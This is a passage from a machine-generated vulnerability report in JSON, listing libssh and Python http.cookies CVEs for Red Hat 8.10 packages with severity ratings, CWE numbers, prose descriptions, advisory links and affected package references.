          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59848",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A flaw was found in libssh. A malicious SFTP server can send responses for unknown request IDs that libssh clients keep queued indefinitely, causing unbounded memory growth and client-side denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59848"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498181"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59848.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59848"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59848"
        }
      ],
      "published": "2026-07-21T14:16:34+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59850",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in libssh. If data packets are processed after a channel is closed, channel data callbacks can be invoked after the associated data has already been freed, leading to crashes or possible use-after-free conditions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59850"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498183"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59850.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59850"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59850"
        }
      ],
      "published": "2026-07-21T15:16:37+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6019",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        150,
        116
      ],
      "description": "http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28247"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28581"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6019"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2460869"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460869"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6019"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28581.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28247"
        },
        {
          "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
        },
        {
          "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
        },
        {
          "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
        },
        {
          "url": "https://github.com/python/cpython/issues/90309"
        },
        {
          "url": "https://github.com/python/cpython/pull/148848"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-6019.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28581.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019"
        }
      ],
      "published": "2026-04-22T20:16:42+00:00",
      "updated": "2026-07-27T17:34:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
